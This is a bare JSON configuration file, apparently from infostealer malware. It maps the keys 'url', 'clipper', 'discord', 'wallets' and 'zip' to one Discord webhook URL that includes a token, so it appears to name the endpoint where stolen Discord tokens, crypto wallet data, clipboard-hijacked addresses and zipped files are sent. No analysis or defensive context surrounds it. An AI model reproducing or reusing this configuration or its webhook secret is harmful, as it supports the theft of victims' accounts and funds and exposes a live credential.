{
    "url": "https://discord.com/api/webhooks/1015991906121035847/flJ9TE27kjew5oaj6xuNz9NhazCfJCtn4sq26nkeyLeWqh-OgwLB3cmL1W-_KXDeedrD",
    "clipper": "https://discord.com/api/webhooks/1015991906121035847/flJ9TE27kjew5oaj6xuNz9NhazCfJCtn4sq26nkeyLeWqh-OgwLB3cmL1W-_KXDeedrD",
    "discord": "https://discord.com/api/webhooks/1015991906121035847/flJ9TE27kjew5oaj6xuNz9NhazCfJCtn4sq26nkeyLeWqh-OgwLB3cmL1W-_KXDeedrD",
    "wallets": "https://discord.com/api/webhooks/1015991906121035847/flJ9TE27kjew5oaj6xuNz9NhazCfJCtn4sq26nkeyLeWqh-OgwLB3cmL1W-_KXDeedrD",
    "zip": "https://discord.com/api/webhooks/1015991906121035847/flJ9TE27kjew5oaj6xuNz9NhazCfJCtn4sq26nkeyLeWqh-OgwLB3cmL1W-_KXDeedrD"
}
